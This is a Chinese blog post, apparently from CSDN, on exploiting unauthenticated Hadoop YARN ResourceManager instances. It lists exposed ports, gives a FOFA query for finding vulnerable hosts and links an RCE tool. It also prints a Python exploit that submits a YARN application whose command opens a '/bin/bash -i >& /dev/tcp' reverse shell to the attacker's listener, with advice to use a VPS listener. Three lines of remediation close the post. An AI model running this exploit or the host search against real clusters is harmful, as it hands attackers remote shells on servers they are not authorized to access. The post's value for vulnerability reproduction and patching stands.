Hadoop YARN ResourceManager 未授权访问

漏洞描述

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览、命令执行等操作,危害极大。

  • 版本:所有版本;
  • 级别:高危;
  • 类别:未授权漏洞

漏洞应用的端口

  • http://25.215.xxx.xxx:19888/
  • http://25.215.xxx.xxx:50070/
  • http://25.215.xxx.xxx:50090/
  • http://25.215.xxx.xxx:50075/
  • http://25.215.xxx.xxx:8088/cluster

FOFA语法搜索

app="APACHE-hadoop-YARN"

漏洞复现

工具

YarnRpcRCE:https://github.com/cckuailong/YarnRpcRCE

EXP

#!/usr/bin/env python
#-- coding:UTF-8 --
import requests

target = 'http://123.58.224.8:32438/' #目标地址
lhost = '10.1.1.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

在这里插入图片描述在这里插入图片描述
在这里插入图片描述PS:我尝试了一下,EXP执行成功了,但是监听的主机没有成功上线;可以利用VPS来进行监听,上线的概率可能会大一点。

修复

  • 将默认认证方法改为KerBeros认证;
  • 在防火墙限制可信任IP才可访问50070端口;
  • 开启身份验证 ,防止未经授权用户访问;
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

OOOOOK.2021

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值